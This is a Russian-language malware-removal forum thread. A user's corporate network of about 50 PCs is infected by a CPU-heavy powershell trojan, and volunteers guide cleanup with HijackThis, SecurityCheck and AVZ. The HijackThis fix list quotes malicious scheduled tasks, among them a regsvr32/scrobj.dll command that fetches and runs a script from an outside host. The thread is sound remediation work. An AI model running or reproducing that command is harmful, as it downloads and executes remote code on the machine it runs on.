Максим Павельев Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 Добрый день. Троян powershell.exe разлетелся по всей корпоративной сети( нагружает ЦП до 100% и делает работу ПК невозможной. удалил его dr.web Cureit, но он снова появляется. помогите пожалуйста есть ли какое лекарство что бы убрать его со всех ПК?
Sandor Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 Здравствуйте! Вам известны правила этой ветки форума. Если нужно только обсудить способ, сообщите и перенесем в другую.
Максим Павельев Опубликовано 28 января, 2019 Автор Опубликовано 28 января, 2019 Здравствуйте! Вам известны правила этой ветки форума. Если нужно только обсудить способ, сообщите и перенесем в другую. извините пожалуйста. почему то не прикрепился лог. да, мне нужен способ и уничтожения вируса. спасибо CollectionLog-2019.01.28-14.41.zip
Sandor Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 "Пофиксите" в HijackThis: O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task: System Log Security Check - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll O22 - Task: Upd7Live - C:\Windows\Upd7Live.exe /exec=DevCon (file missing) O22 - Task: WindowsLogTasks - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 Перезагрузите компьютер вручную и соберите свежий CollectionLog.
Максим Павельев Опубликовано 28 января, 2019 Автор Опубликовано 28 января, 2019 сделал CollectionLog-2019.01.28-16.14.zip
Sandor Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 Здесь больше ничего плохого не видно. Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10) Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Прикрепите этот файл к своему следующему сообщению. Если нужно проверить другой компьютер, создайте для него отдельную тему. 1
Максим Павельев Опубликовано 28 января, 2019 Автор Опубликовано 28 января, 2019 @Sandor, скажите, у меня все это разошлось по всем ПК в сети, это примерно 50 штук. Нужно каждый ручками теперь зачищать?
Sandor Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 Это не универсальное решение. Фикс написан только для указанного компьютера. Давайте посмотрим еще пару компьютеров с похожими симптомами, далее будет понятно как действовать. Смотрите также настройки вашего антивируса - почему это произошло и т.д.
Максим Павельев Опубликовано 28 января, 2019 Автор Опубликовано 28 января, 2019 @Sandor, могу ли я показать эти компьютеры в данной теме?
Sandor Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 создайте для него отдельную темуРазве это сложно?
Максим Павельев Опубликовано 28 января, 2019 Автор Опубликовано 28 января, 2019 @Sandor, нет, просто не хотел, что бы вы путались)хорошо, я создам темы, спасибо)
regist Опубликовано 28 января, 2019 Опубликовано 28 января, 2019 что бы вы путались) путаница это когда в одной теме логи с разных систем. Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ: Запустите AVZ. Запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины) В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip Закачайте полученный архив, как описано на этой странице. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: Яндекс.Диск, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении. PS. эта процедура универсальная, так что желательно это проделать и на остальных.
Максим Павельев Опубликовано 29 января, 2019 Автор Опубликовано 29 января, 2019 мой вирус вернулся(( CollectionLog-2019.01.29-15.04.zip
Sandor Опубликовано 29 января, 2019 Опубликовано 29 января, 2019 Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столеЭто сделайте.
Максим Павельев Опубликовано 29 января, 2019 Автор Опубликовано 29 января, 2019 Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столеЭто сделайте. выполнил SecurityCheck.txt
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти